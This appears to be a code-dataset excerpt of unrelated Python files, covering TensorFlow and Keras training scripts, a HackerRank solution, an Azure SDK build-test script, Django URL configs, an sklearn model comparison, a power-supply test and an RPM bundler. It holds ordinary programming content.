of epochs) and learning rate\nnum_epochs = 5000\nlearningRate = tf.compat.v1.train.exponential_decay(learning_rate=0.001,\n global_step=0,\n decay_steps=100,\n decay_rate=0.95,\n staircase=True)\n# Setting up loss function\nloss_val = tf.nn.l2_loss(sigmoid_op - Y_correct)\n\n# Setting up a single optimization step\n# - reducing the L2 norm between result from sigmoid operation\n# and correct label (one-hot encoded), using an exponentially \n# decaying learning rate.\nopt_out = tf.compat.v1.train.GradientDescentOptimizer(learningRate).minimize(loss_val)\n\nwith tf.compat.v1.Session() as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n # argmax(activation_OP, 1) returns the label with the most probability\n # argmax(yGold, 1) is the correct label\n correct_predictions_OP = tf.equal(tf.argmax(input=sigmoid_op,axis=1),tf.argmax(input=Y_correct,axis=1))\n\n # If every false prediction is 0 and every true prediction is 1, the average returns us the accuracy\n accuracy_OP = tf.reduce_mean(input_tensor=tf.cast(correct_predictions_OP, \"float\"))\n\n # Summary op for regression output\n activation_summary_OP = tf.compat.v1.summary.histogram(\"output\", sigmoid_op)\n\n # Summary op for accuracy\n accuracy_summary_OP = tf.compat.v1.summary.scalar(\"accuracy\", accuracy_OP)\n\n # Summary op for cost\n cost_summary_OP = tf.compat.v1.summary.scalar(\"cost\", loss_val)\n\n # Summary ops to check how variables (W, b) are updating after each iteration\n weightSummary = tf.compat.v1.summary.histogram(\"weights\", weights.eval(session=sess))\n biasSummary = tf.compat.v1.summary.histogram(\"biases\", biases.eval(session=sess))\n\n # Merge all summaries\n merged = tf.compat.v1.summary.merge([activation_summary_OP, accuracy_summary_OP, cost_summary_OP, weightSummary, biasSummary])\n\n # Summary writer\n writer = tf.compat.v1.summary.FileWriter(\"summary_logs\", sess.graph)\n cost = 0\n diff = 1\n epoch_values = []\n accuracy_values = []\n cost_values = []\n for ep in range(num_epochs):\n # Run training step\n step = sess.run(opt_out, feed_dict={X: train_X, Y_correct: train_Y})\n # Report occasional stats\n if ep % 100 == 0:\n # Add epoch to epoch_values\n epoch_values.append(ep)\n # Generate accuracy stats on test data\n train_accuracy, newCost = sess.run([accuracy_OP, loss_val], feed_dict={X: train_X, Y_correct: train_Y})\n # Add accuracy to live graphing variable\n accuracy_values.append(train_accuracy)\n # Add cost to live graphing variable\n cost_values.append(newCost)\n # Re-assign values for variables\n diff = abs(newCost - cost)\n cost = newCost\n\n #generate print statements\n print(\"Step %d, training accuracy %g, cost %g, change in cost %g\"%(ep, train_accuracy, newCost, diff))\n # How well do we perform on held-out test data?\n print(\"Final accuracy on test set: %s\" %\n str(sess.run(accuracy_OP, feed_dict={X: test_X, Y_correct: test_Y})))\n\nfig, ax1 = plt.subplots()\nax1.plot(cost_values, label='Cost function', color='red')\nplt.legend()\nax2 = ax1.twinx()\nax2.plot(accuracy_values, label='Accuracy', color='blue')\n# plt.plot(cost_values, label='Cost function')\n# plt.plot(accuracy_values, label='Accuracy')\nplt.legend()\nplt.show()\n","sub_path":"3_logistic_regression_tf2.py","file_name":"3_logistic_regression_tf2.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"232964192","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 13 22:37:26 2018\n\n@author: Sumeet 
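The script above drives a one-layer sigmoid model through the TF1 compat API with an L2 loss, which is an unusual pairing for a 3-class problem; softmax plus cross-entropy is the standard choice. For comparison, a sketch of the same iris classifier in idiomatic TF2/Keras — a rough equivalent, not a drop-in replacement (no learning-rate decay, no TensorBoard summaries):

import tensorflow as tf
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split

X, y = load_iris(return_X_y=True)
Xtr, Xte, ytr, yte = train_test_split(X, y, test_size=0.3333, random_state=3437)

model = tf.keras.Sequential([
    tf.keras.Input(shape=(4,)),
    tf.keras.layers.Dense(3, activation="softmax"),   # one layer, as above
])
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy",
              metrics=["accuracy"])
model.fit(Xtr, ytr, epochs=200, verbose=0)
print("test accuracy: %.3f" % model.evaluate(Xte, yte, verbose=0)[1])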
Bhambrah\n\nHackerrank | Cracking the Coding Interview\n\nLinked Lists: Detect a cycle\nA linked list is said to contain a cycle if any node is visited more than once while traversing the list. \nComplete the function provided in the editor below.\nIt has one parameter: a pointer to a Node object named head that points to the head of a linked list.\nYour function must return a boolean denoting whether or not there is a cycle in the list.\nIf there is a cycle, return true; otherwise, return false.\nNote: If the list is empty, head will be null.\nInput Format\nOur hidden code checker passes the appropriate argument to your function. You are not responsible for reading any input from stdin.\n\nConstraints\n0<=list size<=100\n\nOutput Format\nIf the list contains a cycle, your function must return true. If the list does not contain a cycle, it must return false.\nThe binary integer corresponding to the boolean value returned by your function is printed to stdout by our hidden code checker.\nDetect a cycle in a linked list. Note that the head pointer may be 'None' if the list is empty.\n\n\"\"\"\n\n''' Note: Run the function code below in the Hackerrank console:\n https://www.hackerrank.com/challenges/ctci-linked-list-cycle/problem '''\n\ndef has_cycle(head):\n if(head):\n prev = {}\n current = head\n if(current.next == None):\n return False\n while(current):\n if current.next in prev:\n return True\n else:\n prev[current] = 1\n current = current.next\n return(False)\n return(False)\n \n \n","sub_path":"hackerrank/cracking the coding interview/linkedLists_detectACycle.py","file_name":"linkedLists_detectACycle.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"367255867","text":"#!/usr/bin/python3\n\nimport os\nimport sys, getopt\nimport os.path\nfrom os import path\n\nclean = False\ndebug = False\nwarning_color = '\\033[91m'\nend_color = '\\033[0m'\n\ndef execute_command(command):\n global debug\n if debug:\n print('Command: {command}'.format(command=command))\n return_value = os.system('%s 2>&1' % command)\n else:\n return_value = os.system('%s > /dev/null 2>&1' % command)\n return return_value\n\ndef cleanup(swagger_name):\n os.chdir('test/integration')\n os.system('rm -Rf azure-rest-api-specs')\n os.system('rm -Rf {swagger_name}'.format(swagger_name=swagger_name))\n os.system('rm -Rf azure-sdk-for-ios')\n os.chdir('../..')\n\ndef code_gen(swagger_name, swagger_spec_directory):\n print('Generate code for {swagger_name}.json'.format(swagger_name=swagger_name))\n os.chdir('test/integration/azure-rest-api-specs')\n if path.exists('../../{swagger_name}'.format(swagger_name=swagger_name)):\n os.rmdir('../../{swagger_name}'.format(swagger_name=swagger_name))\n os.chdir('{swagger_spec_directory}'.format(swagger_spec_directory=swagger_spec_directory))\n return_value = execute_command('autorest --input-file={swagger_name}.json --output-folder=../../../../../../../{swagger_name} --namespace={swagger_name} --use=../../../../../../../../../'.format(swagger_name=swagger_name))\n if return_value == 0:\n print(\"Code generation for {swagger_name}.json is sucessfull\".format(swagger_name=swagger_name))\n else:\n print(warning_color + \"Fail to code gen {swagger_name}.json\" + end_color)\n exit(1)\n os.chdir('../../../../../../../../../')\n\ndef update_repo():\n execute_command('git stash')\n execute_command('git checkout master')\n execute_command('git pull')\n\ndef setup_repo(repo):\n 
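The dictionary-based cycle detector in the record above is correct but uses O(n) extra memory. Floyd's tortoise-and-hare answers the same question in O(1) space; a self-contained sketch with a tiny test harness (the Node class mirrors HackerRank's):

class Node:
    def __init__(self, data):
        self.data, self.next = data, None

def has_cycle(head):
    """Advance one pointer by 1 and one by 2; they meet iff there is a cycle."""
    slow = fast = head
    while fast and fast.next:
        slow, fast = slow.next, fast.next.next
        if slow is fast:
            return True
    return False

a, b = Node(1), Node(2)
a.next = b
assert has_cycle(a) is False
b.next = a                      # introduce a cycle a -> b -> a
assert has_cycle(a) is True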
os.chdir('test/integration')\n\n if path.exists(repo):\n print(\"==Stach any changes and pull from master {repo}==\".format(repo=repo))\n os.chdir(repo)\n update_repo()\n os.chdir('..')\n else:\n print(\"==Clone {repo} repo==\".format(repo=repo))\n execute_command('git clone https://github.com/Azure/{repo}.git'.format(repo=repo))\n\n os.chdir('../..')\n\ndef compile_ios_sdk():\n print(\"==Compile azure-sdk-for-ios repo before adding generated code==\")\n os.chdir('test/integration/azure-sdk-for-ios')\n execute_command('pod install')\n return_value = execute_command('swift build')\n if return_value == 0:\n print(\"Azure ios sdk sucessfully compiled\")\n else:\n print(warning_color + \"Azure ios sdk failed to compile\" + end_color)\n exit(1)\n os.chdir('../../..')\n\ndef compile_ios_sdk_with_generated_code(swagger_name):\n os.chdir('test/integration/azure-sdk-for-ios')\n # Work aroud before the restructed generated code of chat sdk is push\n remove_directories = [\"Options\" , \"Util\", \"Models\"]\n for directory in remove_directories:\n if path.exists('sdk/communication/AzureCommunicationChat/Source/{name}'.format(name=directory)):\n os.system('rm -Rf sdk/communication/AzureCommunicationChat/Source/{name}'.format(name=directory))\n\n remove_files = ['AzureCommunicationChatClient.swift', 'AzureCommunicationChatService.swift']\n for file in remove_files:\n if path.exists('sdk/communication/AzureCommunicationChat/Source/{name}'.format(name=file)):\n os.remove('sdk/communication/AzureCommunicationChat/Source/{name}'.format(name=file))\n\n\n print(\"==Copy new generated code to azure-sdk-for-ios==\")\n execute_command('cp -r ../{swagger_name}/* sdk/communication/AzureCommunicationChat'.format(swagger_name=swagger_name))\n print(\"==Compile azure-sdk-for-ios repo with generated code==\")\n return_value = execute_command('swift build')\n if return_value == 0:\n print(\"Azure ios sdk with Generated code for communicationserviceschat sucessfully compiled\")\n else:\n print(warning_color + \"Azure ios sdk with Generated code for communicationserviceschat failed to compile\" + end_color)\n exit(1)\n\ndef main(argv):\n global clean\n global debug\n\n try:\n opts, args = getopt.getopt(argv,\"dc\", [\"debug\",\"clean\"])\n except getopt.GetoptError:\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"dc\", \"--debug\", \"--clean\"):\n debug = True\n if opt in (\"-c\", \"--clean\"):\n clean = True\n\n swagger_name = r'communicationserviceschat'\n swagger_spec_directory = r'specification/communication/data-plane/Microsoft.CommunicationServicesChat/preview/2020-09-21-preview2'\n if clean:\n cleanup(swagger_name)\n setup_repo(\"azure-sdk-for-ios\")\n setup_repo(\"azure-rest-api-specs\")\n compile_ios_sdk()\n code_gen(swagger_name, swagger_spec_directory)\n compile_ios_sdk_with_generated_code(swagger_name)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"scripts/test_chat_swagger.py","file_name":"test_chat_swagger.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"306400982","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n# @Author: Jola\n# @Time: 2019/5/30 15:25\n\n\nimport json\nimport os\n\nimport requests\nfrom fake_useragent import UserAgent\n\n\ndef get_fake_useragent(company=0):\n if os.path.exists(os.getcwd() + '/zhifo_spider/tools/fake_useragent.json'):\n return os.getcwd() + '/zhifo_spider/tools/fake_useragent.json'\n else:\n proxy = {}\n if company:\n proxy = {\n 'http': 
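The option parsing in the swagger test script above has a bug: getopt yields options like '-d', never 'dc', so `if opt in ("dc", "--debug", "--clean")` means a bare -d does nothing while --clean also switches debug on; the failure message "Fail to code gen {swagger_name}.json" is also printed without .format(). A corrected sketch of just the flag handling (parse_flags is an illustrative name):

import getopt

def parse_flags(argv):
    """'-d'/'--debug' sets debug; '-c'/'--clean' sets clean; nothing overlaps."""
    debug = clean = False
    opts, _args = getopt.getopt(argv, "dc", ["debug", "clean"])
    for opt, _val in opts:
        if opt in ("-d", "--debug"):
            debug = True
        elif opt in ("-c", "--clean"):
            clean = True
    return debug, clean

assert parse_flags(["-d"]) == (True, False)
assert parse_flags(["--clean", "--debug"]) == (True, True)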
'http://web-proxy.tencent.com:8080',\n 'https': 'http://web-proxy.tencent.com:8080',\n }\n res = requests.get('https://fake-useragent.herokuapp.com/browsers/0.1.11', proxies=proxy)\n with open(os.getcwd() + '/zhifo_spider/tools/fake_useragent.json', 'w', encoding='utf-8') as f:\n f.write(json.dumps(res.text))\n return os.getcwd() + '/zhifo_spider/tools/fake_useragent.json'\n\n\ndef get_header(company=0):\n location = get_fake_useragent(company)\n # print(location)\n ua = UserAgent(path=location)\n return ua.random\n\n\nif __name__ == '__main__':\n print(get_header())\n print(os.path.exists(os.getcwd() + '/fake_useragent.json'))\n\n","sub_path":"zhifo_spider/tools/get_ua.py","file_name":"get_ua.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"226614951","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='index'), #rota resp. por atender a requisicao,\n path('receitas/', receita, name='receita'),\n path('buscar', buscar, name='buscar'),\n path('cria/receita', cria_receita, name='cria_receita'),\n path('deleta/', deleta_receita, name='deleta_receita'),\n path('edita/', edita_receita, name='edita_receita'),\n path('atualiza-receita>', atualiza_receita, name='atualiza_receita')\n]\n\n","sub_path":"receitas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"347074457","text":"import django\nfrom django.conf.urls.defaults import *\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('events.views',\n (r'^$', 'index'),\n (r'^playem/(?P\\S+)/embed(?P\\d)/.*$', 'show_embed'),\n (r'^play/(?P\\S+)/$', 'play'),\n (r'^settz/$', 'set_timezone'),\n)\n\n\nurlpatterns += patterns('',\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"220180711","text":"import numpy as np\r\nimport keras\r\nfrom keras.models import Sequential,Input,Model\r\nfrom keras.models import load_model\r\nfrom keras.layers import Dense, Dropout, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.layers.advanced_activations import LeakyReLU\r\nfrom keras.utils import to_categorical\r\nfrom sklearn.model_selection import train_test_split\r\nimport os\r\nfrom time import time\r\n\r\nclass mds_dl:\r\n\tdef __init__(self):\r\n\t\tself.directory = '/home/leo/database/'\r\n\t\tself.test_file = './output/test.csv'\r\n\t\tself.nd = 128\r\n\t\tself.time_domain_bins = 25\r\n\t\tself.p_test = .1\t\t\t\t# Test samples percent\r\n\t\tself.p_validation = .15\t\t\t# Validation samples percent\r\n\r\n\tdef load(self):\r\n\t\tts=time()\r\n\t\tprint('Loading database...')\r\n\t\tdata_X = np.empty((0,self.nd*self.time_domain_bins), float)\r\n\t\tdata_Y = np.empty((0), int)\r\n\t\t\r\n\t\tfor root,dirs,files in os.walk(self.directory):\r\n\t\t\tfor file in files:\r\n\t\t\t\tif file.endswith(\".csv\"):\r\n\t\t\t\t\tprint('Loading '+file+'...')\r\n\t\t\t\t\tdata = np.genfromtxt(self.directory+file, delimiter=',')\r\n\t\t\t\t\tif file.startswith(\"x_\"):\r\n\t\t\t\t\t\tdata_X = np.append(data_X, data, axis=0)\r\n\t\t\t\t\telse: # 
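Both urls.py records above have visibly lost text between angle brackets, presumably to HTML stripping: routes like path('deleta/', ...) and path('atualiza-receita>', ...) need a captured argument for the view to receive an id, and (?P\S+) in the events record is not a valid named group without its <name>. A hedged reconstruction of the receitas routes — the parameter name receita_id is a guess, and the stub views exist only so the sketch imports (assuming Django is installed):

from django.urls import path

def deleta_receita(request, receita_id): ...   # stub views for the sketch
def edita_receita(request, receita_id): ...
def atualiza_receita(request, receita_id): ...

urlpatterns = [
    # '<int:receita_id>' reconstructs the stripped converter; the view
    # receives the captured id as its second argument.
    path('deleta/<int:receita_id>', deleta_receita, name='deleta_receita'),
    path('edita/<int:receita_id>', edita_receita, name='edita_receita'),
    path('atualiza-receita/<int:receita_id>', atualiza_receita,
         name='atualiza_receita'),
]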
y_\r\n\t\t\t\t\t\tdata_Y = np.append(data_Y, data)\r\n\t\t\t\t\tprint(data_X.shape, data_Y.shape)\r\n\r\n\t\tdata_X = data_X.reshape(-1, self.nd, self.time_domain_bins, 1)\r\n\t\tprint(data_X.shape)\r\n\t\tclasses = np.unique(data_Y)\r\n\t\tnClasses = len(classes)\r\n\r\n\t\tdata_Y_one_hot = to_categorical(data_Y)\r\n\r\n\t\ttrain_X, self.test_X, train_label, self.test_label = train_test_split(data_X, data_Y_one_hot, test_size=self.p_test, random_state=42)\r\n\t\tself.train_X, self.valid_X, self.train_label, self.valid_label = train_test_split(train_X, train_label, test_size=self.p_validation, random_state=13)\r\n\t\tprint('Training data shape:', self.train_X.shape, self.train_label.shape)\r\n\t\tprint('Validating data shape:', self.valid_X.shape, self.valid_label.shape)\r\n\t\tprint('Test data shape:', self.test_X.shape, self.test_label.shape)\r\n\t\tprint('Total data shape:', data_X.shape, data_Y.shape)\r\n\t\tprint('Total number of classes:', nClasses)\r\n\t\tprint('Load complete.')\r\n\t\tprint('Time cost:', time()-ts,'s')\r\n\r\n\tdef cnn(self):\r\n\t\tts=time()\r\n\t\tprint('Training using CNN...')\r\n\r\n\t\tbatch_size = 64\r\n\t\tepochs = 6\r\n\t\tnum_classes = self.train_label.shape[1]\r\n\r\n\t\tmodel = Sequential()\r\n\t\tmodel.add(Conv2D(32, kernel_size=(3, 3),activation='linear',input_shape=(self.nd, self.time_domain_bins, 1),padding='same'))\r\n\t\tmodel.add(LeakyReLU(alpha=0.1))\r\n\t\tmodel.add(MaxPooling2D((2, 2),padding='same'))\r\n\t\tmodel.add(Conv2D(64, (3, 3), activation='linear',padding='same'))\r\n\t\tmodel.add(LeakyReLU(alpha=0.1))\r\n\t\tmodel.add(MaxPooling2D(pool_size=(2, 2),padding='same'))\r\n\t\tmodel.add(Conv2D(128, (3, 3), activation='linear',padding='same'))\r\n\t\tmodel.add(LeakyReLU(alpha=0.1)) \r\n\t\tmodel.add(MaxPooling2D(pool_size=(2, 2),padding='same'))\r\n\t\tmodel.add(Flatten())\r\n\t\tmodel.add(Dense(128, activation='linear'))\r\n\t\tmodel.add(LeakyReLU(alpha=0.1)) \r\n\t\tmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\n\t\tmodel.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(),metrics=['accuracy'])\r\n\r\n\t\tmodel.summary()\r\n\r\n\t\tmodel_train = model.fit(self.train_X, self.train_label, batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(self.valid_X, self.valid_label))\r\n\r\n\t\ttest_eval = model.evaluate(self.test_X, self.test_label, verbose=0)\r\n\t\t\r\n\t\tprint(model_train.history)\r\n\t\tprint('Test loss:', test_eval[0])\r\n\t\tprint('Test accuracy:', test_eval[1])\r\n\t\tprint('Train complete.')\r\n\t\tprint('Time cost:', time()-ts,'s')\r\n\t\t# model_json = model.to_json()\r\n\t\t# with open('./output/model.json', 'w') as json_file:\r\n\t\t# \tjson_file.write(model_json)\r\n\t\t# model.save_weights('./output/model.h5')\r\n\t\tmodel.save('./output/mds_cnn_model.h5')\r\n\t\tprint('Saved model to disk.')\r\n\r\n\tdef model_predict(self):\r\n\t\t# json_file = open('./output/model.json', 'r')\r\n\t\t# loaded_model_json = json_file.read()\r\n\t\t# json_file.close()\r\n\t\t# loaded_model = model_from_json(loaded_model_json)\r\n\t\t# loaded_model.load_weights('./output/model.h5')\r\n\t\tloaded_model = load_model('./output/mds_cnn_model.h5')\r\n\t\tprint('Loaded model from disk.')\r\n\r\n\t\ttest_data = np.genfromtxt(self.test_file, delimiter=',')\r\n\t\ttest_data = test_data.reshape(-1, self.nd, self.time_domain_bins, 1)\r\n\t\tprint('Test data shape:',test_data.shape)\r\n\r\n\t\tpred = loaded_model.predict(test_data)\r\n\t\tprint(pred.shape)\r\n\t\tnp.savetxt('./output/pred.csv', 
pred, delimiter=',')\r\n\t\tprint('Saved.')\r\n\r\n\tdef main(self):\r\n\t\tself.load()\r\n\t\tself.cnn()\r\n\t\t# self.model_predict()\r\n\r\nif __name__ == '__main__':\r\n\tmds_dl().main()","sub_path":"scripts/ti_mds_cnn.py","file_name":"ti_mds_cnn.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"239571760","text":"# Jonas Colmsjö, 180129\n\n\n# Imports\n# =======\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn import metrics\n\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.feature_selection import SelectKBest, chi2, f_regression\n\nfrom sklearn.svm import LinearSVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.naive_bayes import MultinomialNB, GaussianNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.calibration import CalibratedClassifierCV\n\nfrom helpers import read_data\n\n\n# Constansts\n# ==========\n\nDATASET = '~/_stora_filer/tig113-projekt/all/application_train.csv'\n#DATASET = '~/_stora_filer/tig113-projekt/all/application_train-1pct.csv'\nNUM_FEATURES = None\n\n\n# Main\n# ====\n\nXtrain, Ytrain, Xtest, Ytest, df = read_data(DATASET, 0.7)\n\nif not NUM_FEATURES is None:\n print('Reducing the number of features to: ', NUM_FEATURES)\n clf = SelectKBest(f_regression, k=NUM_FEATURES).fit(Xtrain, Ytrain)\n Xtrain = clf.transform(Xtrain)\n Xtest = clf.transform(Xtest)\n\n# Get rid of ID and TARGET columns from df since the training data don't have these\ndf = df.drop([df.columns[1], df.columns[2]], axis=1)\ndf = df.columns[clf.get_support()]\nprint('The following columns were selected by SelectKBest\\n', df)\n\nclassifiers = [\n ('Dummy', DummyClassifier(strategy='most_frequent')),\n ('LinearSVC', LinearSVC()),\n ('SGD', SGDClassifier()), # loss=\"modified_huber\" gives predict_proba\n ('GradientBoosting', GradientBoostingClassifier()),\n# ('MultinomialNB', MultinomialNB()),\n ('GaussianNB', GaussianNB())\n# ('DecisionTree', DecisionTreeClassifier()),\n# ('RandomForest', RandomForestClassifier()),\n# ('Perceptron', Perceptron()),\n# ('LogisticRegression', LogisticRegression()),\n# ('MPLC', MLPClassifier(hidden_layer_sizes=(100,))),\n ]\n\nscores = {}\nroc_auc = {}\n\nfor alg, clf in classifiers:\n pipeline = make_pipeline(Imputer(), clf)\n scores[alg] = cross_validate(pipeline, Xtrain, Ytrain, return_train_score=True)\n pipeline.fit(Xtrain, Ytrain)\n predicted = pipeline.predict(Xtest)\n #scores[alg] = np.mean(predicted == Ytest)\n\n print('\\n\\n--- ' + alg + ' ---')\n print('Simple Mean Score: {:.3f}\\n'.format(np.mean(predicted == Ytest)))\n print('Classification report:\\n', metrics.classification_report(Ytest, predicted))\n print('Confusion matrix:\\n', metrics.confusion_matrix(Ytest, predicted))\n\n if alg != 'Perceptron' and alg != 'LinearSVC' and alg != 'SGD':\n Yscore = pipeline.predict_proba(Xtest)\n fpr, tpr, _ = roc_curve(Ytest, Yscore[:,1])\n roc_auc[alg] = auc(fpr, tpr)\n print('\\nROC AUC: ', roc_auc[alg])\n\n if alg == 'LinearSVC':\n cclf = 
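Two things stand out in the loader of the micro-Doppler CNN record above: np.append inside the os.walk loop recopies the whole accumulated array on every file, and the path is built as self.directory + file rather than from root, which would break if the walk ever descends into subdirectories. A sketch of the same loader that gathers per-file arrays and concatenates once (load_dir is an illustrative name; it assumes each x_ CSV is a 2-D block of rows, as the reshape in the original implies):

import os
import numpy as np

def load_dir(directory, nd=128, bins=25):
    """Collect per-file arrays, then concatenate once at the end."""
    xs, ys = [], []
    for root, _dirs, files in os.walk(directory):
        for name in sorted(files):
            if not name.endswith(".csv"):
                continue
            arr = np.genfromtxt(os.path.join(root, name), delimiter=",")
            if name.startswith("x_"):
                xs.append(np.atleast_2d(arr))
            else:                       # y_ files hold the labels
                ys.append(np.atleast_1d(arr))
    X = np.concatenate(xs).reshape(-1, nd, bins, 1)
    y = np.concatenate(ys)
    return X, y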
CalibratedClassifierCV(base_estimator=pipeline)\n cclf.fit(Xtrain, Ytrain)\n Yscore = cclf.predict_proba(Xtest)\n fpr, tpr, _ = roc_curve(Ytest, Yscore[:,1])\n roc_auc[alg] = auc(fpr, tpr)\n print('\\nROC AUC: ', roc_auc[alg])\n\n\n#\n# Print the results\n#\n\nbest_alg, best_score = None, 0\nfor alg, score in scores.items():\n if np.average(score['test_score']) > best_score:\n best_score = np.average(score['test_score'])\n best_alg = alg\n print('{:<40}test score:{:<10.3f}train score:{:<10.3f}'.format(alg,\n np.average(score['test_score']),\n np.average(score['train_score'])))\n\nprint('*** The best algorithm {} has the ROC AUC score {:.3f} ***'.format(best_alg, best_score))\n","sub_path":"select_alg.py","file_name":"select_alg.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"569025123","text":"from tools.common.test import TestReporter\nfrom tools.devices.rigol_meter import RigolMode\nfrom tools.scenarious.scenario import Scenario\n\nLOAD_R = 4.7\nPS_R = 1\n\n\n# noinspection PyMethodParameters\nclass PSTestLoadDC(Scenario):\n def __init__(self):\n super().__init__(\"test_load\")\n\n def on_run(t):\n t.use_devboard()\n t.use_edpro_ps()\n t.use_meter()\n\n t.test_load_dc()\n t.test_load_short()\n\n def test_load_short(t):\n t.print_task(\"test_load_short\")\n t.devboard.set_off()\n t.edpro_ps.set_mode(\"dc\")\n t.edpro_ps.set_volt(5)\n initial = t.edpro_ps.get_values()\n t.check_abs(initial.U, 5, 0.1, \"Cannot set requiret voltage\")\n\n t.devboard.set_pp_load(0)\n t.wait(1)\n t.devboard.set_off()\n after = t.edpro_ps.get_values()\n t.check_abs(after.U, initial.U, 0.01, \"Voltage is not restored after shorting\")\n\n def test_load_dc(t):\n t.print_task(\"test_load_dc\")\n t.devboard.set_off()\n t.edpro_ps.set_mode(\"dc\")\n t.edpro_ps.set_volt(0)\n t.meter.set_mode(RigolMode.VDC_20)\n\n reporter = TestReporter(t.tag)\n\n for volt in [0.2, 0.4, 0.8, 2, 4, 5]:\n t.edpro_ps.set_volt(volt)\n initial_values = t.edpro_ps.get_values()\n t.check_abs(initial_values.U, volt, 0.1, \"Cannot set required voltage\")\n\n t.devboard.set_pp_load(2)\n t.wait(1.0)\n load_values = t.edpro_ps.get_values()\n t.devboard.set_off()\n\n t.check_abs(load_values.I, volt / (LOAD_R + PS_R), 0.2, \"Cannot set required current\")\n t.check_abs(initial_values.U, load_values.U, 0.05, \"Voltage under the load changes too much\")\n\n reporter.trace(f\"V: {volt}, actual: {initial_values.U}, load: {load_values.U}, I={load_values.I}\")\n\n reporter.print_result()\n t.success &= reporter.success\n\n\nif __name__ == \"__main__\":\n PSTestLoadDC().run()\n","sub_path":"tools/scenarious/ps_test_load_dc.py","file_name":"ps_test_load_dc.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"198463020","text":"# Copyright 2020 Alexis Lopez Zubieta\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\nimport 
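The classifier-selection script above has a latent crash: when NUM_FEATURES is None the SelectKBest block is skipped, but df.columns[clf.get_support()] still runs a few lines later and raises NameError because clf was never assigned (the column report belongs inside the same if branch). For reference, a self-contained demonstration of the SelectKBest/get_support pattern the script relies on:

from sklearn.datasets import load_iris
from sklearn.feature_selection import SelectKBest, f_regression

X, y = load_iris(return_X_y=True)
selector = SelectKBest(f_regression, k=2).fit(X, y)
X_reduced = selector.transform(X)
print(X_reduced.shape)           # (150, 2)
print(selector.get_support())    # boolean mask over the original 4 features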
logging\nimport fnmatch\nimport os\n\nfrom AppImageBuilder.app_dir.bundlers.bundler import Bundler\nfrom AppImageBuilder.commands.repoquery import RepoQuery\nfrom AppImageBuilder.commands.rpm_extract import RpmExtract\nfrom AppImageBuilder.commands.yumdownloader import YumDownloader\n\n\nclass YumError(RuntimeError):\n pass\n\n\nclass YumBundler(Bundler):\n def __init__(self, config):\n super().__init__(config)\n\n self.yum_downloader = YumDownloader()\n self.repoquery = RepoQuery()\n self.rpm_extract = RpmExtract()\n\n def run(self):\n download_list = self.repoquery.requires(self.config.include_list, self.config.arch)\n download_list.extend(self.config.include_list)\n download_list = [pkg for pkg in download_list if not self._is_excluded(pkg)]\n\n self.yum_downloader.download(download_list, self.config.archives_path)\n\n self._extract_packages_into_app_dir(app_dir_path)\n\n def _is_excluded(self, pkg):\n for exclude_expr in self.config.exclude_list:\n if fnmatch.fnmatch(pkg, exclude_expr):\n return True\n\n return False\n\n def _extract_packages_into_app_dir(self, app_dir_path):\n archives_dir_files = os.listdir(self.config.archives_path)\n rpm_files = [file for file in archives_dir_files if self._is_rpm_file(file)]\n\n for file_name in sorted(rpm_files):\n if not self._is_excluded(file_name):\n logging.info(\"Deploying: %s\" % file_name)\n\n file_path = os.path.join(self.config.archives_path, file_name)\n self.rpm_extract.extract(file_path, app_dir_path)\n else:\n logging.info('Excluding: %s' % file_name)\n\n def _is_rpm_file(self, file_name):\n return file_name.endswith('.rpm')\n\n 